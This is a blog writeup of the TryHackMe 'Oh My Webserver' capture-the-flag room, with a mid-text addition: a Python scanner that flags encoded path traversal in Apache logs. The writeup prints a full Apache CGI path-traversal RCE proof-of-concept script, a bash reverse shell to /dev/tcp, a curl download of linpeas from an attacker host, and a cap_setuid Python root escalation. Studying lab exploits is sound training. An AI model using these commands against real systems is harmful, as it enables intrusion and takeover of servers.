Oh My Webserver — Writeup

Rishabh Rai
4 min read · Mar 5, 2022

LINK TO THE ROOM : https://tryhackme.com/room/ohmyweb

My Target IP : 10.10.215.246

Let’s run a quick recon on the Target IP

nmap 10.10.215.246 -p- --min-rate 1000

Strange, port 80 is showing as closed.

This is something I learned in a CTF: try the knock command to check whether the port opens or not.

And it worked!

Running a detailed scan on the discovered port.

nmap 10.10.215.246 -p 80,22 -sCV -oN nmap_initial -Pn

Note the version of the web server.

Started directory brute-forcing on the web server.

There is an error which might be exploitable but we don’t know for sure.

So let's use the most powerful tool in cybersecurity: Google.

Googling for an exploit for the web server version that is running, I found:

#!/bin/bash
# Usage: ./PoC.sh <TARGET-LIST.TXT> <PATH> [COMMAND]
if [[ -z "$1" || -z "$2" ]]; then
    echo "Usage: ./PoC.sh [TARGET-LIST.TXT] [PATH] [COMMAND]"
    echo "Example: ./PoC.sh targets.txt /etc/passwd"
    exit 1
fi
# One target URL per line in the list file
for host in $(cat "$1"); do
    echo "$host"
    curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"
done

# PoC.sh targets.txt /etc/passwd
# PoC.sh targets.txt /bin/sh whoami

First, copy this exploit and save it as exploit.sh, then create a targets.txt file containing "http://<targetIP>":

chmod +x exploit.sh

echo -e 'http://<TARGET_IP>' > targets.txt

bash exploit.sh targets.txt /bin/sh "<command>"

Now that we have RCE, let's get a reverse shell.

bash exploit.sh targets.txt /bin/bash "bash -i >& /dev/tcp/10.2.61.21/4242 0>&1"
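From the defender's side, the requests the PoC above sends leave a recognisable trace in the Apache access log: a path whose percent-encoded segments decode to "..". The following is an added example, not part of the original writeup or the PoC, that scans access-log lines for that pattern; it generalises beyond the PoC to upper-case and double-encoded variants. The log lines are constructed samples.

```python
import re
from urllib.parse import unquote

# Constructed sample Apache combined-format access log lines (not from the room).
SAMPLE_LOG = """\
10.0.0.5 - - [05/Mar/2022:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [05/Mar/2022:10:00:02 +0000] "POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1" 200 97 "-" "curl/7.68.0"
10.0.0.9 - - [05/Mar/2022:10:00:03 +0000] "GET /cgi-bin/.%2E/%2E%2E/etc/passwd HTTP/1.1" 200 1823 "-" "curl/7.68.0"
10.0.0.9 - - [05/Mar/2022:10:00:04 +0000] "GET /icons/..%252f..%252fetc/passwd HTTP/1.1" 404 196 "-" "curl/7.68.0"
10.0.0.7 - - [05/Mar/2022:10:00:05 +0000] "GET /docs/a..b/readme.txt HTTP/1.1" 200 40 "-" "Mozilla/5.0"
"""

# Request line inside the quoted part of a combined-format entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')


def is_traversal(path: str) -> bool:
    """True if the path, after up to three percent-decoding passes, contains a
    segment that is exactly '..'. Repeated decoding catches %2e%2e (one pass)
    as well as double-encoded forms such as %252e (two passes)."""
    seen = set()
    current = path.split("?", 1)[0]  # ignore the query string
    for _ in range(3):
        if any(seg == ".." for seg in current.split("/")):
            return True
        if current in seen:  # decoding reached a fixed point, stop early
            break
        seen.add(current)
        current = unquote(current)
    return any(seg == ".." for seg in current.split("/"))


def flag_traversal_requests(log_text: str) -> list[dict]:
    """Return one record per log line whose request path encodes a traversal."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        path = m.group("path")
        if is_traversal(path):
            hits.append({
                "client": line.split()[0],
                "method": m.group("method"),
                "path": path,
                "cgi_bin": path.lower().startswith("/cgi-bin/"),
            })
    return hits
```

Requests flagged with cgi_bin set are the ones worth triaging first, since that is the prefix the PoC relies on; a 200 status on such a line is a strong indicator the traversal succeeded.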

What is the user flag?

To get root in the Docker container, I downloaded linpeas and executed it:

curl http://<attacker_ip>:<port>/linpeas.sh -o linpeas.sh

chmod +x linpeas.sh && ./linpeas.sh > out.txt

On reading the linpeas output I found something interesting in the capabilities.

cap_setuid+ep

cap_setuid can be exploited with:

/usr/bin/python3.7 -c 'import os; os.setuid(0); os.system("/bin/bash")'

cat /root/user.txt

What is the root flag?

For further enumeration I executed linpeas again.

/tmp/linpeas.sh

172.17.0.1

Didn't find much in linpeas except this IP, so I thought of scanning it. For that I will have to get nmap onto the box, so let's get nmap.

How to get an nmap executable that you can transfer and run:

GitHub link: https://github.com/andrew-d/static-binaries

Now let's run a Python server here and transfer it to the shell.

chmod +x nmap_

let’s run this :

./nmap_ 172.17.0.1 -p- --min-rate 1000

(we know the IP to scan from linpeas’s output)

Port 5986 seems interesting; let's google whether there is an exploit for it.

Unauthenticated RCE: CVE-2021-38647

LINK TO THE EXPLOIT:

https://github.com/AlteredSecurity/CVE-2021-38647

THERE YOU HAVE IT! Room is completed

HAPPY HACKING!! 🎉🥳

LINK TREE: https://linktr.ee/RishabhRai


4th year student exploring the world of cyber security with a knack for writing and always learning.